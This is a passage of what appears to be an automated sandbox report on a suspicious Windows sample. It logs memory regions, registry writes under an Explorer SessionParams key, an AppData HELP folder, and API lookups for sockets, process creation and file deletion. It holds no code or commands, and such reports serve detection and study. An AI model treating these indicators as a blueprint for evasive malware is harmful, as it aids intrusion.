| private_0x00000000000d0000 | 0x000d0000 | 0x001cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000001d0000 | 0x001d0000 | 0x0020ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x0037ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000380000 | 0x00380000 | 0x00447fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000450000 | 0x00450000 | 0x004effff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000530000 | 0x00530000 | 0x0053ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000540000 | 0x00540000 | 0x00640fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x00000000007f0000 | 0x007f0000 | 0x008effff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72dd0000 | 0x72e14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| dhcpcsvc.dll | 0x73fc0000 | 0x73fd1fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| winnsi.dll | 0x74120000 | 0x74126fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| iphlpapi.dll | 0x74130000 | 0x7414bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffdc000 | 0x7ffdc000 | 0x7ffdcfff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffde000 | 0x7ffde000 | 0x7ffdefff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Registry (35)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
1 | |
| Create Key | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | - |
|
5 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Timout, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IsActive, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = BSlp, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = SDCnt, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = EmtParam, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 16, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IListLen, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IList, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Installed, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ISFValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LastId, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = NTries, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IMValue, data = 0, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = LCValue, data = 0, type = REG_NONE |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = Id, size = 8, type = REG_BINARY |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = IPlace, size = 100, type = REG_BINARY |
|
2 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = HtParam, data = 7200, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = StVal, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = CMValue, data = 0, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Write Value | HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Explorer\SessionParams | value_name = ILevelCount, data = 1, size = 4, type = REG_DWORD_LITTLE_ENDIAN |
|
1 |
Module (104)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Load | iphlpapi.dll | base_address = 0x74130000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetComputerNameW, address_out = 0x762103ff |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemInfo, address_out = 0x76223728 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetVersionExW, address_out = 0x76213b1a |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetEnvironmentVariableA, address_out = 0x7621ce2e |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CopyFileA, address_out = 0x7623532c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLastError, address_out = 0x7621bf00 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFileAttributesA, address_out = 0x76208cb9 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetFileSize, address_out = 0x76210273 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateDirectoryA, address_out = 0x762368da |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = TerminateProcess, address_out = 0x76212331 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryW, address_out = 0x76223c01 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = LoadLibraryA, address_out = 0x7622395c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = MultiByteToWideChar, address_out = 0x7622452b |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCreateKeyExA, address_out = 0x76711469 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegEnumValueA, address_out = 0x7670cf49 |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegDeleteValueA, address_out = 0x7672a4ea |
|
1 | |
| Get Address | c:\windows\system32\advapi32.dll | function = RegCloseKey, address_out = 0x7671469d |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memset, address_out = 0x77729790 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcpy, address_out = 0x77729910 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = memcmp, address_out = 0x77737975 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = malloc, address_out = 0x77729cee |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = free, address_out = 0x77729894 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strchr, address_out = 0x7772dbeb |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncpy, address_out = 0x777308a9 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = atoi, address_out = 0x7772dbe0 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snwprintf, address_out = 0x777495d1 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strncat, address_out = 0x77750909 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strstr, address_out = 0x7772de4a |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strlen, address_out = 0x777343d3 |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = strrchr, address_out = 0x7772dbae |
|
1 | |
| Get Address | c:\windows\system32\msvcrt.dll | function = _snprintf, address_out = 0x7774fa7c |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = OemToCharA, address_out = 0x77b2f041 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfA, address_out = 0x77ae3f47 |
|
1 | |
| Get Address | c:\windows\system32\user32.dll | function = wsprintfW, address_out = 0x77af426d |
|
1 | |
| Get Address | c:\windows\system32\iphlpapi.dll | function = GetAdaptersInfo, address_out = 0x74139263 |
|
1 | |
| Get Address | c:\windows\system32\iphlpapi.dll | function = GetPerAdapterInfo, address_out = 0x7413d3b8 |
|
1 |
System (5)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Time | type = System Time, time = 2018-04-29 13:06:23 (UTC) |
|
1 | |
| Get Time | type = Ticks, time = 93631 |
|
1 | |
| Get Time | type = System Time, time = 2018-04-29 13:06:24 (UTC) |
|
1 | |
| Get Info | type = System Directory, result_out = C:\Windows\system32 |
|
2 |
Environment (3)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
1 | |
| Get Environment String | name = APPDATA, result_out = C:\Users\EEBsYm5\AppData\Roaming |
|
2 |
Process #4: gorctexxzx.exe
118
0
| Information | Value |
|---|---|
| ID | #4 |
| File Name | c:\windows\system32\gorctexxzx.exe |
| Command Line | "C:\Windows\System32\goRcteXxZX.exe" /dll="C:\Users\EEBsYm5\Desktop\97328F~1.DLL" /fn_id=DllCanUnloadNow |
| Initial Working Directory | C:\Windows\system32\ |
| Monitor | Start Time: 00:00:30, Reason: Child Process |
| Unmonitor | End Time: 00:02:29, Reason: Terminated by Timeout |
| Monitor Duration | 00:01:59 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xa6c |
| Parent PID | 0xa3c (c:\windows\system32\gorctexxzx.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | CRH2YWU7\EEBsYm5 |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
A70
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000010000 | 0x00010000 | 0x0002ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000010000 | 0x00010000 | 0x0001ffff | Pagefile Backed Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000020000 | 0x00020000 | 0x00020fff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000030000 | 0x00030000 | 0x00033fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x0000000000040000 | 0x00040000 | 0x00040fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| locale.nls | 0x00050000 | 0x000b6fff | Memory Mapped File | Readable |
|
|
|
- |
| private_0x00000000000c0000 | 0x000c0000 | 0x000c0fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000000d0000 | 0x000d0000 | 0x0014ffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0024ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000250000 | 0x00250000 | 0x00317fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000340000 | 0x00340000 | 0x0043ffff | Private Memory | Readable, Writable |
|
|
|
- |
| pagefile_0x0000000000440000 | 0x00440000 | 0x00540fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x0000000000550000 | 0x00550000 | 0x005cffff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x00000000005e0000 | 0x005e0000 | 0x005effff | Private Memory | Readable, Writable |
|
|
|
- |
| gorctexxzx.exe | 0x011d0000 | 0x011f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x0000000001200000 | 0x01200000 | 0x01dfffff | Pagefile Backed Memory | Readable |
|
|
|
- |
| api-ms-win-core-synch-l1-2-0.dll | 0x72db0000 | 0x72db2fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| 97328f~1.dll | 0x72dd0000 | 0x72e14fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
|
| kernelbase.dll | 0x75f70000 | 0x75fb9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| kernel32.dll | 0x761d0000 | 0x762a3fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| imm32.dll | 0x762b0000 | 0x762cefff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| nsi.dll | 0x762d0000 | 0x762d5fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| sechost.dll | 0x762e0000 | 0x762f8fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shlwapi.dll | 0x76300000 | 0x76356fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| lpk.dll | 0x765f0000 | 0x765f9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| advapi32.dll | 0x76700000 | 0x7679ffff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| shell32.dll | 0x767a0000 | 0x773e9fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| usp10.dll | 0x773f0000 | 0x7748cfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ws2_32.dll | 0x77510000 | 0x77544fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| rpcrt4.dll | 0x77550000 | 0x775f0fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msvcrt.dll | 0x77720000 | 0x777cbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ole32.dll | 0x77970000 | 0x77acbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| user32.dll | 0x77ad0000 | 0x77b98fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| msctf.dll | 0x77ba0000 | 0x77c6bfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| gdi32.dll | 0x77c80000 | 0x77ccdfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| apisetschema.dll | 0x77e80000 | 0x77e80fff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| ntdll.dll | 0x77ec0000 | 0x77ffbfff | Memory Mapped File | Readable, Writable, Executable |
|
|
|
- |
| pagefile_0x000000007f6f0000 | 0x7f6f0000 | 0x7f7effff | Pagefile Backed Memory | Readable |
|
|
|
- |
| pagefile_0x000000007ffb0000 | 0x7ffb0000 | 0x7ffd2fff | Pagefile Backed Memory | Readable |
|
|
|
- |
| private_0x000000007ffd4000 | 0x7ffd4000 | 0x7ffd4fff | Private Memory | Readable, Writable |
|
|
|
- |
| private_0x000000007ffdf000 | 0x7ffdf000 | 0x7ffdffff | Private Memory | Readable, Writable |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\win.com | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create | C:\Windows\system32\kernel32.dll | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP | - |
|
1 | |
| Create Directory | C:\Users\EEBsYm5\AppData\Roaming\HELP\system32\ | - |
|
1 | |
| Get Info | C:\Windows\system32\win.com | type = time |
|
1 | |
| Get Info | C:\Windows\system32\kernel32.dll | type = time |
|
1 | |
| Open | STD_INPUT_HANDLE | - |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
1 | |
| Open | STD_ERROR_HANDLE | - |
|
1 |
Module (101)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Load | kernel32.dll | base_address = 0x761d0000 |
|
2 | |
| Load | ws2_32.dll | base_address = 0x77510000 |
|
1 | |
| Load | advapi32.dll | base_address = 0x76700000 |
|
1 | |
| Load | msvcrt.dll | base_address = 0x77720000 |
|
1 | |
| Load | user32.dll | base_address = 0x77ad0000 |
|
1 | |
| Get Handle | c:\windows\system32\kernel32.dll | base_address = 0x761d0000 |
|
12 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Windows\System32\goRcteXxZX.exe, size = 260 |
|
6 | |
| Get Filename | - | process_name = c:\windows\system32\gorctexxzx.exe, file_name_orig = C:\Users\EEBsYm5\Desktop\97328F~1.DLL, size = 260 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsAlloc, address_out = 0x7622418d |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsGetValue, address_out = 0x76221e16 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsSetValue, address_out = 0x762276e6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FlsFree, address_out = 0x76221f61 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = EncodePointer, address_out = 0x77f1a295 |
|
8 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DecodePointer, address_out = 0x77f1cd10 |
|
3 | |
| Get Address | c:\windows\system32\kernel32.dll | function = IsProcessorFeaturePresent, address_out = 0x762276b5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetProcAddress, address_out = 0x762233d3 |
|
2 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSAStartup, address_out = 0x77513ab2 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = WSACleanup, address_out = 0x77513c5f |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = gethostbyname, address_out = 0x77527673 |
|
1 | |
| Get Address | c:\windows\system32\ws2_32.dll | function = inet_ntoa, address_out = 0x7751b131 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateFileA, address_out = 0x7621cee8 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WriteFile, address_out = 0x76221400 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CloseHandle, address_out = 0x7621ca7c |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindFirstFileA, address_out = 0x76222d89 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindNextFileA, address_out = 0x7621a187 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FindClose, address_out = 0x76220e62 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = DeleteFileA, address_out = 0x762147cb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = FileTimeToSystemTime, address_out = 0x76221dfe |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = SetFilePointer, address_out = 0x7621db36 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateProcessA, address_out = 0x761d2082 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = WaitForSingleObject, address_out = 0x7621ba90 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = ReadFile, address_out = 0x762196fb |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = CreateEventW, address_out = 0x76223386 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetSystemDirectoryA, address_out = 0x76218fc5 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetWindowsDirectoryW, address_out = 0x762104b6 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathA, address_out = 0x76236a65 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetTempPathW, address_out = 0x76208b33 |
|
1 | |
| Get Address | c:\windows\system32\kernel32.dll | function = GetLocalTime, address_out = 0x7621a90e |
|
1 | |
